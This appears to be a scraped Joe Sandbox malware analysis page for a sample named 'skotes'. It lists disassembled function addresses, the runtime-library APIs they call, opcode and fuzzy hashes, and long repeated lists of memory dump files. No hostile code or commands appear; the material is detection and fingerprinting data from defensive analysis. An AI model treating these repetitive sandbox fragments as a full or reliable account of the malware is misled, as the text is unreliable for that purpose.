Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: iA
API String ID: 1182035702-1118743441
Opcode ID: 44bd3080b73c1477e3e77adc034eaf94d8acea1012cb4d9343d720ce2a986297
Instruction ID: dbfce4fa691d0a98bc3aa8749e6742a9d80362ff2df78e67c0c5db40cb0b6eee
Opcode Fuzzy Hash: 44bd3080b73c1477e3e77adc034eaf94d8acea1012cb4d9343d720ce2a986297
Instruction Fuzzy Hash: 1321F374C002099ADF24DFA6C4456EEB7F0FF14324F10052FE851A22C1E7B84AC6CB48

Function 004278E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427903

Part of subcall function 00425CB8: __EH_prolog3_catch.LIBCMT ref: 00425CBF
Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0042792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427936

Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425D70
Part of subcall function 00425CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427982
Concurrency::location::_Assign.LIBCMT ref: 004279A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004279AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004279BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004279ED

Part of subcall function 0042691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426942
Part of subcall function 0042691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426965

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: be26d28973ab40e19276e1e39a9ed43843e9869f42fe47dc141d3d43563d5587
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 9F314670B083715AEF16AA7854927FF77B59F01304F4401ABD485D7342DA2C4D8AC3D9

Function 00444C14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444C98
__alloca_probe_16.LIBCMT ref: 00444D5E
__freea.LIBCMT ref: 00444DCA

Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,F89C42A9,?,?,0041D3FC,F89C42A9,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E

__freea.LIBCMT ref: 00444DD3
__freea.LIBCMT ref: 00444DF6

Strings

ZC,mC, xrefs: 00444C26

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: ZC,mC
API String ID: 1423051803-3499607563
Opcode ID: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
Instruction ID: 3df8754f567642f5bc12b9c6ac1686bc91f11376b98a6e44c20c24ac8824f300
Opcode Fuzzy Hash: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
Instruction Fuzzy Hash: 1651D5B2A00216ABFB255F55DC81FBB36A9DFC4754F15012BFD0497251EB38DC1186A8

Function 0042DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0042DD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0042DDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0042DE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0042DE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0042DE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0042DE4B
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0042DE74

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: 5ad63c1b420a2bf52cb8b3588fb72bc2c3132c889c9b7eb879e497c126c90066
Instruction ID: f1fabc8e0c887fbee8e2ec9558ce6889dd68099345497c82765e1d73775b2d10
Opcode Fuzzy Hash: 5ad63c1b420a2bf52cb8b3588fb72bc2c3132c889c9b7eb879e497c126c90066
Instruction Fuzzy Hash: 4E41BC70F146649ADF14EBA1A4557ED77616F11308F9444AFE8416B3C3DB3C8E08C76A

Function 0042E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7

Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E577
Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: 01245f0547eb729828e98329900f8f6e173d559f1909e94d2917f6101dcd408e
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 19415A39A00214EFCF00EF65D484AADB7B5FF48314F5480AAED499B382DB34A941CB95

Function 00416E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00416ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00416F22
std::_Rethrow_future_exception.LIBCPMT ref: 00416F32
__Mtx_unlock.LIBCPMT ref: 00416FD5
__Mtx_unlock.LIBCPMT ref: 004170DB
__Mtx_unlock.LIBCPMT ref: 00417116

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
